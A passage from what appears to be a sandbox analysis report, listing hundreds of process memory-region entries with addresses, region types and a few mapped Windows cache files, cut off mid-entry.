Region: id = 1937 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1938 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1939 start_va = 0x460000 end_va = 0x47bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1940 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1941 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1942 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1943 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1944 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1945 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1946 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1947 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1948 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1949 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1950 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1951 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1952 start_va = 0x9a20000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 1953 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1954 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1957 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1958 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1961 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1962 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1963 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1966 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1967 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1968 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1971 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1973 start_va = 0x450000 end_va = 0x46bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1977 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1978 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1979 start_va = 0x460000 end_va = 0x477fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 1980 start_va = 0x450000 end_va = 0x467fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 1981 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1982 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1983 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1985 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1986 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1987 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1988 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1989 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1991 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1992 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1993 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1996 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1997 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1998 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2001 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2002 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2003 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2004 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2006 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2007 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2008 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2011 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2012 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2013 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2016 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2017 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2018 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2021 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2022 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2023 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2026 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2027 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2028 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2031 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2032 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2033 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2036 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2037 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2038 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2041 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2042 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2043 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 2044 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2045 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2048 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2049 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2050 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2053 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2054 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2055 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2058 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2059 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2060 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2063 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2064 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2065 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2069 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2070 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2071 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2072 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2075 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2076 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2077 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2080 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2081 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2082 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2084 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2086 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2087 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2088 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2089 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2092 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2093 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2094 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2097 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2098 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2099 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2102 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2103 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2104 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2107 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2108 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2109 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2112 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2113 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2114 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2117 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2118 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2119 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2120 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2122 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2123 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2124 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2126 start_va = 0x400000 end_va = 0x40efff monitored = 